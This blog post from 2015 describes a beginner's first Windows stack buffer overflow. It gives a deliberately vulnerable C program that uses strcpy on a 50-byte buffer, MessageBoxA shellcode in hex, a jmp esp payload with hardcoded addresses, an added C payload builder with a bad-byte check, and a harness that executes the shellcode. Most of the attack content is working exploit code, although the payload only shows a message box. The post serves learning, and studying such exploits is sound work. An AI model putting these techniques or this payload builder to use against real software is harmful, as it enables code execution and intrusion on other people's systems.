Software Vulnerability Study: Buffer Overflow (Part 1)

by Netfairy - 2015-06-05

Everyone says exploit writing is where the experts gather. I have only just started learning it, and it really is hard!!! After fiddling for ages I finally got my first buffer overflow attack to succeed.

(screenshot: 3.png)

When I saw that box pop up I almost cried. It was not easy. After all that fiddling I still do not understand why the principle is so simple yet getting it to work is so hard. Maybe I am just too much of a beginner.

Enough of that. Let me write a few things down first. The source code:


#include<stdio.h>
#include<stdlib.h>   /* exit() */
#include<windows.h>
#include<string.h>
#define PASSWORD "1234567"   /* not used in this simplified version */

/* Deliberately vulnerable: buffer is 50 bytes and strcpy copies without a
   length check, so a password of 50 or more bytes overwrites the saved EBP
   and the return address above it. The return value is always 0; the
   overflow, not the password check, is the point of this program. */
int verify_password(char *password)
{
	char buffer[50];
	strcpy(buffer,password);   /* stack overflow when strlen(password) >= 50 */
	return 0;
}

int main()
{
	int flag=0;
	char password[1024];
	FILE * fp;
	LoadLibrary("user32.dll");   /* make sure user32 is mapped so the MessageBoxA address used by the shellcode is valid */
	fp=fopen("c:\\password.txt","r");   /* the payload is read from this file */
	if(fp==NULL)
	{
		MessageBox(NULL,"Failed to open file","error",NULL);
		exit(0);
	}
	fscanf(fp,"%s",password);   /* %s without a width: reads until the first whitespace byte */
	flag=verify_password(password);
	if(flag)
	{
		printf("Wrong password\n");
	}
	else
	{
		printf("Password correct\n");
	}
	fclose(fp);
	return 0;
}

shellcode: 33DB536861697279684E6574668BC453505053B87664D377FFD090909090909090909090909090909090909090909090909090909090909038FB1200

This was tested on my machine; on another machine it is guaranteed to fail. 7664D377 is the address of MessageBoxA on my machine (0x77D36476, written little-endian), and 38FB1200 is the stack address of the shellcode (0x0012FB38), which is what overwrites the return address. The 26 shellcode bytes push "Netfairy\0" onto the stack, take its address into eax, push the four arguments, and call MessageBoxA(0, "Netfairy", "Netfairy", 0) through mov eax,<address>; call eax; the NOPs that follow pad the payload out to the return address.

jmp esp method: 3132333435363738393132333435363738393132333435363738393132333435363738393132333435363738393132333435363731313131FC18D47733DB536861697279684E6574668BC453505053B87664D377FFD0

FC18D477 is the address of a jmp esp instruction (0x77D418FC, written little-endian); everything after it, from 33DB on, is the shellcode (shown in green in the original). The first 52 bytes of "123456789…" fill buffer[50] and its alignment padding, the four "1111" bytes (31313131) land on the saved EBP, and the jmp esp address overwrites the return address. When verify_password returns, esp points at the byte right after the return address, so jmp esp transfers control to the shellcode without needing the stack address of the buffer. The jmp esp address is still taken from a system DLL on my machine, so it too changes between systems.
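As an added example, not from the original post, the C program below builds both payload layouts described above (shellcode + NOP sled + hardcoded buffer address, and filler + saved EBP + jmp esp + shellcode) from the post's own shellcode bytes and addresses, and adds a delivery check the post does not mention: because the target reads the file with fscanf("%s") in text mode and copies it with strcpy, any whitespace byte, a 0x1A byte or an early NUL would cut the payload short. The 56-byte distance to the return address, the addresses 0x77D36476, 0x0012FB38 and 0x77D418FC are taken from the post; the function names, the hex decoder and the bad-byte check are this example's own.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* The 26-byte shellcode from the post: builds "Netfairy\0" on the stack and calls
 * MessageBoxA(0, "Netfairy", "Netfairy", 0) through mov eax,<addr>; call eax.
 * The address 0x77D36476 is the post's value and is specific to one machine. */
const uint8_t kShellcode[26] = {
    0x33, 0xDB,                         /* xor ebx, ebx                        */
    0x53,                               /* push ebx  (string terminator)       */
    0x68, 0x61, 0x69, 0x72, 0x79,       /* push "airy"                         */
    0x68, 0x4E, 0x65, 0x74, 0x66,       /* push "Netf"  -> esp = "Netfairy\0"  */
    0x8B, 0xC4,                         /* mov eax, esp                        */
    0x53, 0x50, 0x50, 0x53,             /* push uType=0, caption, text, hWnd=0 */
    0xB8, 0x76, 0x64, 0xD3, 0x77,       /* mov eax, 0x77D36476 (MessageBoxA)   */
    0xFF, 0xD0                          /* call eax                            */
};

/* x86 stores the least significant byte first, which is why 0x77D36476
 * appears as 76 64 D3 77 in the post's hex dumps. */
void put_le32(uint8_t *dst, uint32_t v)
{
    dst[0] = (uint8_t)v;         dst[1] = (uint8_t)(v >> 8);
    dst[2] = (uint8_t)(v >> 16); dst[3] = (uint8_t)(v >> 24);
}

uint32_t get_le32(const uint8_t *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Decode a hex string like the ones in the post. Returns the byte count, 0 on error. */
size_t hex_decode(const char *hex, uint8_t *out, size_t cap)
{
    size_t n = strlen(hex);
    if (n % 2 != 0 || n / 2 > cap) return 0;
    for (size_t i = 0; i < n; i += 2) {
        unsigned v;
        if (sscanf(hex + i, "%2x", &v) != 1) return 0;
        out[i / 2] = (uint8_t)v;
    }
    return n / 2;
}

/* Method 1: [shellcode][NOP sled][return address <- stack address of buffer].
 * ret_off is the distance from buffer[0] to the saved return address
 * (56 in the post: buffer[50] padded to 52, plus 4 bytes of saved EBP). */
size_t build_direct_payload(uint8_t *out, size_t cap, size_t ret_off, uint32_t buf_addr,
                            const uint8_t *sc, size_t sc_len)
{
    if (sc_len > ret_off || cap < ret_off + 4) return 0;
    memcpy(out, sc, sc_len);
    memset(out + sc_len, 0x90, ret_off - sc_len);   /* NOPs pad up to the return address */
    put_le32(out + ret_off, buf_addr);              /* execution resumes at buffer[0]    */
    return ret_off + 4;
}

/* Method 2: [filler][fake EBP "1111"][return address <- jmp esp][shellcode].
 * After ret pops the jmp esp address, esp points at the next byte, i.e. the shellcode,
 * so no stack address is needed; only the jmp esp address is machine-specific. */
size_t build_jmp_esp_payload(uint8_t *out, size_t cap, size_t ret_off, uint32_t jmp_esp,
                             const uint8_t *sc, size_t sc_len)
{
    if (ret_off < 4 || cap < ret_off + 4 + sc_len) return 0;
    for (size_t i = 0; i < ret_off - 4; i++)
        out[i] = (uint8_t)('1' + i % 9);            /* "123456789123...", like the post */
    memcpy(out + ret_off - 4, "1111", 4);           /* marks the saved EBP slot          */
    put_le32(out + ret_off, jmp_esp);
    memcpy(out + ret_off + 4, sc, sc_len);
    return ret_off + 4 + sc_len;
}

/* Delivery check (not in the post): fscanf("%s") stops at whitespace, the Windows CRT
 * treats 0x1A as end of file in text mode, and strcpy stops at NUL. A NUL in the very
 * last position is fine, since strcpy copies the terminator (this is why 38FB1200 works).
 * Returns the index of the first byte that would break delivery, or -1. */
int find_bad_byte(const uint8_t *p, size_t n)
{
    for (size_t i = 0; i < n; i++) {
        uint8_t b = p[i];
        if (b == 0x00 && i + 1 == n) continue;
        if (b == 0x00 || b == 0x1A || b == 0x20 || (b >= 0x09 && b <= 0x0D)) return (int)i;
    }
    return -1;
}

int main(int argc, char **argv)
{
    uint8_t payload[256];
    /* Addresses are the post's values; re-read them for any other machine. */
    size_t n = build_jmp_esp_payload(payload, sizeof payload, 56, 0x77D418FCu,
                                     kShellcode, sizeof kShellcode);
    int bad = find_bad_byte(payload, n);
    if (n == 0 || bad >= 0) {
        fprintf(stderr, "payload unusable (bad byte at offset %d)\n", bad);
        return 1;
    }
    printf("return address slot -> 0x%08X\n", get_le32(payload + 56));
    if (argc > 1) {                      /* e.g. c:\password.txt for the target program */
        FILE *fp = fopen(argv[1], "wb");
        if (!fp) return 1;
        fwrite(payload, 1, n, fp);
        fclose(fp);
    } else {
        for (size_t i = 0; i < n; i++) printf("%02X", payload[i]);
        printf("\n");
    }
    return 0;
}
```

Run without arguments it prints the hex form, which should match the post's jmp esp payload byte for byte; with a file name it writes the raw bytes in binary mode so that the CRT does not translate anything on the way out. Before handing any new address to it, check that none of its bytes is whitespace, 0x1A or a non-trailing NUL, since those never survive fscanf("%s") and strcpy.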


Debugging the shellcode:

#include<stdio.h>
#include<windows.h>
/* Same shellcode as above, but with the MessageBoxA address of the machine this
   harness was run on. The last four bytes before \xFF\xD0 are that address. */
char shellcode[]="\x33\xDB\x53\x68\x61\x69\x72\x79\x68\x4E\x65\x74\x66\x8B\xC4\x53\x50\x50\x53\xB8\x1E\xFD\x98\x75\xFF\xD0";

int main()
{
	LoadLibrary("user32.dll");   /* MessageBoxA must be mapped at the hardcoded address */
	/* MSVC 32-bit inline assembly: push the address of the shellcode array and
	   "return" into it, so the bytes execute as code and can be single-stepped
	   in the debugger. shellcode[] lives in a writable data section, so this
	   only works when DEP is off for the process. */
	_asm
	{
		lea eax,shellcode;
		push eax;
		ret;
	}
	return 0;
}

1EFD9875 is the address of MessageBoxA on that machine (0x7598FD1E, written little-endian).